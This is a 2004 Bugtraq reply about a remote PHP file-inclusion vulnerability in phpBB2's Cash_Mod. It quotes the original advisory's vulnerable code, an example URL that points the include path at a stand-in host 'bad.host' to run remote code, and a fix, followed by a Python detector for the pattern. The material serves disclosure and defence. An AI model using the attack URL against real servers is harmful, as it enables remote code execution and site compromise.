[37401] in bugtraq


Re: Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.)

daemon@ATHENA.MIT.EDU (Rafael San Miguel Carrasco)
Thu Nov 18 15:39:30 2004

Message-ID: <419CD7DE.1070304@yahoo.es>
Date: Thu, 18 Nov 2004 18:11:58 +0100
From: Rafael San Miguel Carrasco <smcsoc@yahoo.es>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
In-Reply-To: <20041118044742.16170.qmail@www.securityfocus.com>
Content-Type: text/plain; charset=windows-1252; format=flowed
Content-Transfer-Encoding: 8bit


Let me just point out that this vulnerability can only be exploited if
two options in php.ini are enabled:

- allow_url_fopen
- register_globals

The first one allows HTTP resources to be accessed and retrieved from
fopen; the second lets a user specify GET or POST parameters that will be
translated into PHP variables.

For more information about PHP insertion and how it can be recognized
and exploited:
http://www.fistconference.org/data/presentaciones/exploitingwebapplications.tar

Greetings.

-------------------------------
Rafael San Miguel Carrasco
Security Consultant
Davinci Consulting
-------------------------------

Jerome ATHIAS wrote:

>Hi all 
>
>phpBB is a very popular message board using module extensions. 
>
>One of these modules, Cash_Mod, is a very popular one and is used by many people. It has critical vulnerabilities, one of them letting anyone inject malicious PHP code that will be executed on the server side. 
>
>Let’s start : 
>
>In file /admin/admin_cash.php 
>
>….. 
>if ( !empty($setmodules) ) 
>{ 
>include($phpbb_root_path . 'includes/functions_cash.'.$phpEx); 
>$menu = array(); 
>admin_menu($menu); 
>…. 
>
>First, nothing seems wrong! It’s just a normal piece of code with “include” functions, but 
>$phpbb_root_path & $phpEx are *NOT* defined yet! 
>
>
>I don’t know why, but someone decided to define these variables later in the code : 
>
>…… 
>// 
>// Let's set the root dir for phpBB 
>// 
>$phpbb_root_path = "./../"; 
>require($phpbb_root_path . 'extension.inc'); 
>require('./pagestart.' . $phpEx); 
>include($phpbb_root_path . 'includes/functions_selects.'.$phpEx); 
>
>….. 
>
>Well, any user can rewrite these parameters with GET or POST requests. 
>
>Example : 
>http://victim.host/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://bad.host/ 
>
>
>Fix : 
>Set all default parameters after “if ( !empty($setmodules) )” 
>
>Example : 
>
>// 
>// Let's set the root dir for phpBB 
>// 
>$phpbb_root_path = "./../"; 
>require($phpbb_root_path . 'extension.inc'); 
>require('./pagestart.' . $phpEx); 
>include($phpbb_root_path . 'includes/functions_selects.'.$phpEx); 
>
>if ( !empty($setmodules) ) 
>{ 
>include($phpbb_root_path . 'includes/functions_cash.'.$phpEx); 
>$menu = array(); 
>admin_menu($menu); 
>
>
>Thank you rofl!
>
>  
>
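
A file-local check for the pattern discussed in this thread, added here as an example and not part of either message: it reports include/require paths built from variables that nothing earlier in the file has assigned, which are the ones a request can supply when register_globals is on. The two PHP samples are constructed from the quoted layouts, and treating an earlier include with a fully assigned path as a possible source of later variables (such as $phpEx from extension.inc) is an assumption of this sketch.

```python
import re

# Constructed samples modelled on the two admin_cash.php layouts quoted above.
VULNERABLE = """<?php
if ( !empty($setmodules) )
{
    include($phpbb_root_path . 'includes/functions_cash.'.$phpEx);
    $menu = array();
}
$phpbb_root_path = "./../";
require($phpbb_root_path . 'extension.inc');
"""

FIXED = """<?php
$phpbb_root_path = "./../";
require($phpbb_root_path . 'extension.inc');
if ( !empty($setmodules) )
{
    include($phpbb_root_path . 'includes/functions_cash.'.$phpEx);
}
"""

# include/require statement; group 1 is the path expression up to the ';'
INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\b\s*\(?([^;]*);')
# plain assignment "$name =", excluding "==" and "=>"
ASSIGN_RE = re.compile(r'(\$\w+)\s*=(?![=>])')
VAR_RE = re.compile(r'\$\w+')


def unset_include_vars(php_source):
    """Return [(line_no, variable)] for include/require paths that use a
    variable with no earlier assignment in the same file."""
    assigned, findings, trusted_include = set(), [], False
    for line_no, line in enumerate(php_source.splitlines(), 1):
        if line.lstrip().startswith('//'):      # skip full-line comments
            continue
        for match in INCLUDE_RE.finditer(line):
            unknown = [v for v in VAR_RE.findall(match.group(1))
                       if v not in assigned]
            if not unknown:
                # Assumption: a file included via a known path may define
                # globals, so later unknown names are no longer reported.
                trusted_include = True
            elif not trusted_include:
                findings.extend((line_no, v) for v in unknown)
        assigned.update(ASSIGN_RE.findall(line))
    return findings


if __name__ == "__main__":
    for name, src in (("vulnerable", VULNERABLE), ("fixed", FIXED)):
        print(name, unset_include_vars(src))
```

The check is line-based and ignores control flow, so a finding is a prompt to read the file, not proof that the include is reachable with a request-supplied value.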


